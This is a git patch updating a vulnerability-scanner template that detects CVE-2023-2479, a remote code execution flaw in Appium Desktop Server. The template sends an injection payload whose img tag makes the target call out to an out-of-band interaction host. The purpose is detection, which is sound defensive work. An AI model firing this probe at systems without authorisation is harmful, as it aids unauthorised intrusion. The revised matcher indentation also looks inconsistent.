From ae67cf87ba6fac76bc89a70d92e4a2b0108d04da Mon Sep 17 00:00:00 2001
From: Dhiyaneshwaran <leedhiyanesh@gmail.com>
Date: Tue, 26 Sep 2023 12:33:31 +0530
Subject: [PATCH] minor update

---
 http/cves/2023/CVE-2023-2479.yaml | 46 ++++++++++++++-----------------
 1 file changed, 20 insertions(+), 26 deletions(-)

diff --git a/http/cves/2023/CVE-2023-2479.yaml b/http/cves/2023/CVE-2023-2479.yaml
index 54d902d607..4400dbfcef 100644
--- a/http/cves/2023/CVE-2023-2479.yaml
+++ b/http/cves/2023/CVE-2023-2479.yaml
@@ -1,53 +1,47 @@
 id: CVE-2023-2479
 
 info:
-  name: Zero Click Remote Code Execution on Appium Desktop Server
-  author: zn9988, Aden Yap Chuen Zhen (chuenzhen.yap2@baesystems.com)
-  severity: Critical
-  description: Appium Desktop Server is susceptible to an unauthenticated remote code execution vulnerability.
+  name: Appium Desktop Server - Remote Code Execution
+  author: zn9988
+  severity: critical
+  description: |
+    OS Command Injection in GitHub repository appium/appium-desktop prior to v1.22.3-4.
+  remediation: Fixed in v1.22.3-4
   classification:
     cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H
     cvss-score: 9.8
     cve-id: CVE-2023-2479
+    cwe-id: CWE-78
+    epss-score: 0.0008
+    epss-percentile: 0.3333
+    cpe: cpe:2.3:a:appium:appium-desktop:*:*:*:*:*:*:*:*
   reference: 
     - https://nvd.nist.gov/vuln/detail/CVE-2023-2479
     - https://huntr.dev/bounties/fbdeec3c-d197-4a68-a547-7f93fb9594b4/
-  tags: http,rce,dast,oast,cve,electron
+  tags: cve,cve2023,appium,oast,rce
 
-requests:
+http:
   - method: GET
     path:
       - '{{BaseURL}}/?url=<img/src="http://{{interactsh-url}}">'
       
     matchers-condition: and
     matchers:
-          # Response String
+      - type: word
+        part: interactsh_protocol
+        words:
+          - "dns"
+
         - type: word
           part: body
           words: 
             - "The requested resource could not be found, or a request was received using an HTTP method that is not supported by the mapped resource"
 
-          # Status Code
-        - type: status
-          status:
-            - 404
-            
-          # Content Type
         - type: word
           part: header
           words:
             - "application/json"
 
-          # Response Header
-        - type: word
-          part: header
-          words:
-            - "X-Powered-By: Express"
-        
-          # Captured the interact callbacks
-        - type: word
-          part: interactsh_protocol
-          condition: or
-          words:
-            - "dns"
-            - "http" 
+        - type: status
+          status:
+            - 404